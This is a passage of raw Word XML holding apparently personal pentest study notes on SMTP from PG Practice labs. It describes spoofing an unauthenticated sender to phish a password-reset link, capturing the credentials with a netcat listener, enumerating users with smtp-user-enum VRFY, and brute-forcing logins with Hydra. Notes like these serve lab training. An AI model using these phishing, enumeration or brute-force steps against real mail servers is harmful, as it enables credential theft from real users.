      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Form this, they saw </w:t>
      </w:r>
      <w:hyperlink r:id="rId822">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the one sending the email, and SMTP required no authentication, so they could send an email as </w:t>
      </w:r>
      <w:hyperlink r:id="rId823">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And so they did and inside the email they used key words like "Password", "Reset" and "Link" and put the URL of our own computer in the email to "change the password." This is because the email we got legit says that IT team will be sending links to reset password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then set up a listener on our IP for port 80 and when they clicked on the link, we got a POST request sent to our netcat listener which includes the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId824">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</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278C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278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8E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4a4puqout91s" w:id="347"/>
      <w:bookmarkEnd w:id="347"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002790">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002791">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen on Port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">25 465 or 587</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002792">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002793">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Often interacted with through Telnet for enumeration, or when you are doing Phishing attacks using Swaks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002794">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002795">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId825">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hepet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice does some good enumeration for SMTP since it was a phishing attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002796">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum -M VRFY -U users.txt -t 192.168.134.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002797">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then used the creds they found here to enumerate IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002798">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002799">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId826">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice also has good smtp user enumeration and reading emails and sending phishing email using SMTP. They logged into POP3. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Test for valid SMTP usernames:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId827">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I recommend using usernamer.py to create a very versatile username list given your usernames as shown in the Postfish writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like from Brian Moore, it creates: brian.moore, bmoore, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'brian moore' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'sarah lorem' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'claire madison' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'mike ross' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum -M VRFY -D postfish.off -U smtp_usernames.txt -t 192.168.58.137</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Pentestmonkey’s tool for enumerating SMTP users. It sends crafted SMTP commands (VRFY, EXPN, RCPT TO, etc.) to test for valid accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-M VRFY </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ sets the mode to use the VRFY SMTP command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY &lt;user&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">asks the server "does this user exist?"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server responds positively, you know the user/mailbox exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D postfish.off </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ sets the target domain name for building addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: if the tool is testing user brian.moore, it queries VRFY brian.moore@postfish.off.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U smtp_usernames.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ the file containing candidate usernames (one per line).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You built this file using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usernamer.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for names like brian moore, sarah lorem, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That script generates username variations like brian.moore, bmoore, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 192.168.58.137 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ target mail server IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce SMTP using Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt smtp://target</w:t>
      </w:r>
    </w:p>
